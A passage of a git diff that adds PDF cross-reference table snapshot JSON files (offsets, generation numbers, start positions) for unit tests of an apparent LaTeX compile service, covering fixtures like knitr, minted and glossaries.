"uncompressed": true + }, + { + "offset": 713, + "gen": 0, + "uncompressed": true + }, + { + "offset": 763, + "gen": 0, + "uncompressed": true + }, + { + "offset": 892, + "gen": 0, + 
"uncompressed": true + }, + { + "offset": 1007, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1235, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4832, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12199, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19196, + "gen": 0, + "uncompressed": true + }, + { + "offset": 26341, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13, + "gen": 0 + }, + { + "offset": 13, + "gen": 1 + }, + { + "offset": 13, + "gen": 2 + }, + { + "offset": 13, + "gen": 3 + }, + { + "offset": 13, + "gen": 4 + }, + { + "offset": 13, + "gen": 5 + }, + { + "offset": 13, + "gen": 6 + }, + { + "offset": 13, + "gen": 7 + }, + { + "offset": 13, + "gen": 8 + }, + { + "offset": 13, + "gen": 9 + }, + { + "offset": 13, + "gen": 10 + }, + { + "offset": 13, + "gen": 11 + }, + { + "offset": 13, + "gen": 12 + }, + { + "offset": 13, + "gen": 13 + }, + { + "offset": 13, + "gen": 14 + } + ], + "startXRefTable": 27312 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/feynmp/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/feynmp/XrefTable.json new file mode 100644 index 0000000..0863cfa --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/feynmp/XrefTable.json @@ -0,0 +1,110 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 65535, + "free": true + }, + { + "offset": 4964, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5023, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5234, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 734, + "gen": 0, + "uncompressed": true + }, + { + "offset": 799, + "gen": 0, + "uncompressed": true + }, + { + "offset": 933, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1104, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1947, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1992, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2182, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2427, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2597, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2822, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2989, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3239, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3271, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3328, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3740, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4270, + "gen": 0, + "uncompressed": true + } + ], + "startXRefTable": 6682 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome/XrefTable.json new file mode 100644 index 0000000..efe6646 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome/XrefTable.json @@ -0,0 +1,113 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 31058, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31307, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 855, + "gen": 0, + "uncompressed": true + }, + { + "offset": 970, + "gen": 0, + "uncompressed": true + }, + { + 
"offset": 1203, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18852, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30165, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + }, + { + "offset": 11, + "gen": 8 + }, + { + "offset": 11, + "gen": 9 + }, + { + "offset": 11, + "gen": 10 + }, + { + "offset": 11, + "gen": 11 + } + ], + "startXRefTable": 31307 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome_xelatex/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome_xelatex/XrefTable.json new file mode 100644 index 0000000..3bc5421 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/fontawesome_xelatex/XrefTable.json @@ -0,0 +1,129 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 6344, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 707, + "gen": 0, + "uncompressed": true + }, + { + "offset": 757, + "gen": 0, + "uncompressed": true + }, + { + "offset": 887, + "gen": 0, + "uncompressed": true + }, + { + "offset": 990, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1257, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1679, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2052, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4249, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4343, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5387, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5481, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5519, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0 + }, + { + "offset": 15, + "gen": 1 + }, + { + "offset": 15, + "gen": 2 + }, + { + "offset": 15, + "gen": 3 + }, + { + "offset": 15, + "gen": 4 + }, + { + "offset": 15, + "gen": 5 + }, + { + "offset": 15, + "gen": 6 + }, + { + "offset": 15, + "gen": 7 + }, + { + "offset": 15, + "gen": 8 + }, + { + "offset": 15, + "gen": 9 + }, + { + "offset": 15, + "gen": 10 + } + ], + "startXRefTable": 6344 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/glossaries/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/glossaries/XrefTable.json new file mode 100644 index 0000000..7c0a261 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/glossaries/XrefTable.json @@ -0,0 +1,114 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 34767, + "gen": 0, + "uncompressed": true + }, + { + "offset": 35015, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 971, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1394, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10990, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19087, + "gen": 0, + "uncompressed": true + }, + { + "offset": 33769, + "gen": 0, + 
"uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + }, + { + "offset": 12, + "gen": 9 + }, + { + "offset": 12, + "gen": 10 + } + ], + "startXRefTable": 35015 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/gnuplot/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/gnuplot/XrefTable.json new file mode 100644 index 0000000..3c7f692 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/gnuplot/XrefTable.json @@ -0,0 +1,109 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 23295, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23543, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 671, + "gen": 0, + "uncompressed": true + }, + { + "offset": 721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 847, + "gen": 0, + "uncompressed": true + }, + { + "offset": 955, + "gen": 0, + "uncompressed": true + }, + { + "offset": 7385, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15752, + "gen": 0, + "uncompressed": true + }, + { + "offset": 22721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + }, + { + "offset": 11, + "gen": 8 + }, + { + "offset": 11, + "gen": 9 + }, + { + "offset": 11, + "gen": 10 + } + ], + "startXRefTable": 23543 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/hebrew/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/hebrew/XrefTable.json new file mode 100644 index 0000000..ebbe74f --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/hebrew/XrefTable.json @@ -0,0 +1,101 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 24490, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24739, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 657, + "gen": 0, + "uncompressed": true + }, + { + "offset": 707, + "gen": 0, + "uncompressed": true + }, + { + "offset": 833, + "gen": 0, + "uncompressed": true + }, + { + "offset": 948, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1290, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13083, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23411, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + }, + { + "offset": 11, + "gen": 8 + } + ], + "startXRefTable": 24739 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/knitr/XrefTable.json 
b/services/clsi/test/unit/js/snapshots/pdfjs/knitr/XrefTable.json new file mode 100644 index 0000000..272bd59 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/knitr/XrefTable.json @@ -0,0 +1,148 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 43550, + "gen": 0, + "uncompressed": true + }, + { + "offset": 43799, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 734, + "gen": 0, + "uncompressed": true + }, + { + "offset": 784, + "gen": 0, + "uncompressed": true + }, + { + "offset": 913, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1021, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1546, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5794, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12915, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23660, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30657, + "gen": 0, + "uncompressed": true + }, + { + "offset": 42604, + "gen": 0, + "uncompressed": true + }, + { + "offset": 14, + "gen": 0 + }, + { + "offset": 14, + "gen": 1 + }, + { + "offset": 14, + "gen": 2 + }, + { + "offset": 14, + "gen": 3 + }, + { + "offset": 14, + "gen": 4 + }, + { + "offset": 14, + "gen": 5 + }, + { + "offset": 14, + "gen": 6 + }, + { + "offset": 14, + "gen": 7 + }, + { + "offset": 14, + "gen": 8 + }, + { + "offset": 14, + "gen": 9 + }, + { + "offset": 14, + "gen": 10 + }, + { + "offset": 14, + "gen": 11 + }, + { + "offset": 14, + "gen": 12 + }, + { + "offset": 14, + "gen": 13 + }, + { + "offset": 14, + "gen": 14 + }, + { + "offset": 14, + "gen": 15 + }, + { + "offset": 14, + "gen": 16 + } + ], + "startXRefTable": 43799 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/knitr_utf8/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/knitr_utf8/XrefTable.json new file mode 100644 index 0000000..de34dac --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/knitr_utf8/XrefTable.json @@ -0,0 +1,182 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 75299, + "gen": 0, + "uncompressed": true + }, + { + "offset": 75548, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 790, + "gen": 0, + "uncompressed": true + }, + { + "offset": 840, + "gen": 0, + "uncompressed": true + }, + { + "offset": 975, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1083, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2128, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13799, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23682, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31867, + "gen": 0, + "uncompressed": true + }, + { + "offset": 36116, + "gen": 0, + "uncompressed": true + }, + { + "offset": 50352, + "gen": 0, + "uncompressed": true + }, + { + "offset": 61569, + "gen": 0, + "uncompressed": true + }, + { + "offset": 73516, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + 
"gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + }, + { + "offset": 16, + "gen": 14 + }, + { + "offset": 16, + "gen": 15 + }, + { + "offset": 16, + "gen": 16 + }, + { + "offset": 16, + "gen": 17 + }, + { + "offset": 16, + "gen": 18 + }, + { + "offset": 16, + "gen": 19 + }, + { + "offset": 16, + "gen": 20 + }, + { + "offset": 16, + "gen": 21 + }, + { + "offset": 16, + "gen": 22 + } + ], + "startXRefTable": 75548 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/latex_compiler/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/latex_compiler/XrefTable.json new file mode 100644 index 0000000..a76dcc2 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/latex_compiler/XrefTable.json @@ -0,0 +1,140 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 65535, + "free": true + }, + { + "offset": 25097, + "gen": 0, + "uncompressed": true + }, + { + "offset": 25156, + "gen": 0, + "uncompressed": true + }, + { + "offset": 25367, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 854, + "gen": 0, + "uncompressed": true + }, + { + "offset": 919, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1074, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1245, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18343, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18388, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18752, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19071, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19360, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19604, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19770, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20007, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20174, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20424, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20456, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20525, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23109, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23500, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24229, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24641, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24741, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24985, + "gen": 0, + "uncompressed": true + } + ], + "startXRefTable": 26815 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/lualatex_compiler/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/lualatex_compiler/XrefTable.json new file mode 100644 index 0000000..adb457f --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/lualatex_compiler/XrefTable.json @@ -0,0 +1,94 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 3568, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3777, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 643, + "gen": 0, + "uncompressed": true + }, + { + "offset": 693, + "gen": 0, + "uncompressed": true + }, + { + "offset": 819, + "gen": 0, + "uncompressed": true + }, + { + "offset": 934, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1118, + 
"gen": 0, + "uncompressed": true + }, + { + "offset": 1210, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2555, + "gen": 0, + "uncompressed": true + }, + { + "offset": 3030, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + } + ], + "startXRefTable": 3777 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/makeindex-custom-style/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex-custom-style/XrefTable.json new file mode 100644 index 0000000..c9aa365 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex-custom-style/XrefTable.json @@ -0,0 +1,128 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 16762, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16877, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17142, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24335, + "gen": 0, + "uncompressed": true + }, + { + "offset": 32164, + "gen": 0, + "uncompressed": true + }, + { + "offset": 32412, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 671, + "gen": 0, + "uncompressed": true + }, + { + "offset": 721, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 973, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1318, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2218, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13, + "gen": 0 + }, + { + "offset": 13, + "gen": 1 + }, + { + "offset": 13, + "gen": 2 + }, + { + "offset": 13, + "gen": 3 + }, + { + "offset": 13, + "gen": 4 + }, + { + "offset": 13, + "gen": 5 + }, + { + "offset": 13, + "gen": 6 + }, + { + "offset": 13, + "gen": 7 + }, + { + "offset": 13, + "gen": 8 + }, + { + "offset": 13, + "gen": 9 + }, + { + "offset": 13, + "gen": 10 + }, + { + "offset": 13, + "gen": 11 + } + ], + "startXRefTable": 32412 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/makeindex/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex/XrefTable.json new file mode 100644 index 0000000..9027317 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/makeindex/XrefTable.json @@ -0,0 +1,111 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 16778, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16893, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17109, + "gen": 0, + "uncompressed": true + }, + { + "offset": 24938, + "gen": 0, + "uncompressed": true + }, + { + "offset": 25186, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 650, + "gen": 0, + "uncompressed": true + }, + { + "offset": 700, + "gen": 0, + "uncompressed": true + }, + { + "offset": 836, + "gen": 0, + "uncompressed": true + }, + { + "offset": 953, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1298, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2103, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 
2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + } + ], + "startXRefTable": 25186 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/minted/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/minted/XrefTable.json new file mode 100644 index 0000000..1b93bf0 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/minted/XrefTable.json @@ -0,0 +1,97 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 20679, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20927, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 650, + "gen": 0, + "uncompressed": true + }, + { + "offset": 700, + "gen": 0, + "uncompressed": true + }, + { + "offset": 826, + "gen": 0, + "uncompressed": true + }, + { + "offset": 934, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1252, + "gen": 0, + "uncompressed": true + }, + { + "offset": 8248, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20115, + "gen": 0, + "uncompressed": true + }, + { + "offset": 11, + "gen": 0 + }, + { + "offset": 11, + "gen": 1 + }, + { + "offset": 11, + "gen": 2 + }, + { + "offset": 11, + "gen": 3 + }, + { + "offset": 11, + "gen": 4 + }, + { + "offset": 11, + "gen": 5 + }, + { + "offset": 11, + "gen": 6 + }, + { + "offset": 11, + "gen": 7 + } + ], + "startXRefTable": 20927 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/multibib_bibliography/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/multibib_bibliography/XrefTable.json new file mode 100644 index 0000000..095ae85 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/multibib_bibliography/XrefTable.json @@ -0,0 +1,156 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 29506, + "gen": 0, + "uncompressed": true + }, + { + "offset": 29621, + "gen": 0, + "uncompressed": true + }, + { + "offset": 29918, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30033, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30274, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30389, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30644, + "gen": 0, + "uncompressed": true + }, + { + "offset": 42802, + "gen": 0, + "uncompressed": true + }, + { + "offset": 43050, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 695, + "gen": 0, + "uncompressed": true + }, + { + "offset": 746, + "gen": 0, + "uncompressed": true + }, + { + "offset": 900, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1017, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1286, + "gen": 0, + "uncompressed": true + }, + { + "offset": 2443, + "gen": 0, + "uncompressed": true + }, + { + "offset": 13147, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + 
"gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + } + ], + "startXRefTable": 43050 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/nomenclature/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/nomenclature/XrefTable.json new file mode 100644 index 0000000..dac0da2 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/nomenclature/XrefTable.json @@ -0,0 +1,114 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 34102, + "gen": 0, + "uncompressed": true + }, + { + "offset": 34350, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 678, + "gen": 0, + "uncompressed": true + }, + { + "offset": 728, + "gen": 0, + "uncompressed": true + }, + { + "offset": 856, + "gen": 0, + "uncompressed": true + }, + { + "offset": 971, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1514, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10973, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19139, + "gen": 0, + "uncompressed": true + }, + { + "offset": 33047, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + }, + { + "offset": 12, + "gen": 9 + }, + { + "offset": 12, + "gen": 10 + } + ], + "startXRefTable": 34350 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/references_in_include/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/references_in_include/XrefTable.json new file mode 100644 index 0000000..1295744 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/references_in_include/XrefTable.json @@ -0,0 +1,111 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 9449, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9564, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9730, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17293, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17541, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 650, + "gen": 0, + "uncompressed": true + }, + { + "offset": 700, + "gen": 0, + "uncompressed": true + }, + { + "offset": 835, + "gen": 0, + "uncompressed": true + }, + { + "offset": 952, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1097, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1758, + "gen": 0, + "uncompressed": true + }, + { + "offset": 12, + "gen": 0 + }, + { + "offset": 12, + "gen": 1 + }, + { + "offset": 12, + "gen": 2 + }, + { + "offset": 12, + "gen": 3 + }, + { + "offset": 12, + "gen": 4 + }, + { + "offset": 12, + "gen": 5 + }, + { + "offset": 12, + "gen": 6 + }, + { + "offset": 12, + "gen": 7 + }, + { + "offset": 12, + "gen": 8 + } + ], + "startXRefTable": 17541 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/simple_bibliography/XrefTable.json 
